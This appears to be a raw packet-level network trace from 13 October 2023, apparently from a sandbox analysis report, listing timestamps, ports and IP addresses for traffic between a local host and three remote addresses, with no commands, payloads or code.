Oct 13, 2023 15:21:16.225512981 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.225536108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.225568056 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.225575924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.225599051 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.225625992 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.227626085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.227662086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.227698088 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.227705002 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.227725029 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.227754116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.229598999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.229618073 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.229712963 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.229722023 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.229763031 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.231451035 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.231471062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.231515884 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.231523037 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.231554985 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.231565952 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.233561039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.233580112 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.233614922 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.233622074 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.233650923 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.233669996 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.235563040 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.235582113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.235614061 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.235621929 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.235652924 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.235662937 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.237425089 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.237442970 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.237479925 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.237487078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.237514019 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.237535000 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.239262104 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.239298105 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.239320040 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.239326954 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.239358902 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.239370108 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.241558075 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.241578102 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.241631985 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.241640091 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.241652012 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.241693020 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.243608952 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.243653059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.243686914 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.243694067 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.243730068 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.243740082 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.245538950 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.245558023 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.245589018 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.245598078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.245646954 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.247371912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.247407913 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.247432947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.247440100 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.247464895 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.247479916 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.249185085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.249203920 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.249241114 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.249248028 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.249274969 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.249289036 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.250550032 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.250567913 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.250600100 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.250608921 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.250634909 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.250649929 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.306746006 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:16.454895973 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.479623079 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.479655981 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.479676962 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.479731083 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.479794979 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.479814053 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.479845047 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.479938984 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.479981899 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.480000019 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480032921 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480076075 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.480133057 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480246067 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480263948 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480288982 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.480329990 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480362892 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480372906 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.480432034 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480473042 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480473995 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.480593920 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480633974 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480638027 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.480683088 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480730057 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.480762959 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.480958939 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481000900 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.481009960 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481081963 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481122971 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.481144905 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481194019 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481240988 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.481307983 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481380939 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481424093 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.481431007 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481583118 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481600046 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481635094 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.481693983 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481720924 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481743097 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.481807947 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481851101 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.481861115 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481905937 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481950045 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.481951952 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.482069969 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482105970 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482115030 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.482181072 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482233047 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482239962 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.482250929 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482295990 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.482316017 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482352018 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482394934 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.482451916 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482521057 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482537985 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482564926 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.482644081 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482662916 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482690096 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.482795954 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.482842922 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.482935905 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483077049 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483119011 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.483151913 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483231068 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483279943 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.483294010 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483310938 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483351946 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.483447075 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483511925 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483561993 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.483570099 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483675003 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483721972 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.483767986 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483788967 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483831882 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.483861923 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.483973980 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484019995 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484052896 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484122038 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484172106 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484204054 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484268904 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484280109 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484332085 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484364033 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484385014 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484468937 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484519958 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484551907 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484607935 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484652996 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484699965 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484746933 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484797955 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484802008 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484890938 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.484944105 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.484977007 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.485008001 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.485055923 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.485066891 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.485156059 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.485207081 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.485219002 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.485296011 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.485342026 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.524396896 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.524410009 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.524436951 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.524472952 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.524508953 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.524525881 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.524549961 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.526293039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.526312113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.526350975 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.526359081 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.526376009 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.526398897 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.528211117 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.528228045 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.528315067 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.528326035 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.528363943 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.530165911 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.530190945 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.530227900 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.530235052 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.530265093 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.530286074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.532670021 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.532690048 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.532727003 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.532736063 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.532749891 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.532773972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.534554005 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.534573078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.534607887 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.534615993 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.534631968 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.534651995 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.537218094 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.537235975 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.537273884 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.537281990 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.537308931 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.537318945 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.539237022 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.539254904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.539293051 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.539300919 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.539314985 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.539340019 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.541419029 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.541436911 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.541479111 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.541486025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.541501999 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.541522980 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.544198990 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.544218063 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.544251919 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.544259071 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.544275045 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.544298887 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.546305895 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.546324015 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.546344995 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.546375990 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.546382904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.546423912 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.548752069 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.548772097 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.548808098 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.548816919 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.548830986 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.548858881 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.551207066 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.551224947 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.551258087 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.551266909 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.551280022 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.551306009 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.552803993 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.552822113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.552855968 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.552864075 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.552886963 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.552897930 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.554610968 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.554629087 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.554673910 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.554683924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.554702044 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.554724932 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.557668924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.557697058 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.557732105 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.557740927 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.557760954 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.557777882 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.559571028 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.559592009 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.559624910 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.559633970 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.559654951 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.559678078 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.561412096 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.561434031 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.561472893 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.561480999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.561496973 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.561521053 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.563520908 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.563539982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.563570976 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.563580036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.563594103 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.563621044 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.566098928 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.566118956 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.566148996 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.566157103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.566171885 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.566199064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.568341017 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.568360090 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.568392038 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.568398952 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.568413973 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.568439007 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.570399046 CEST	443	49736	45.130.41.106	192.168.2.5
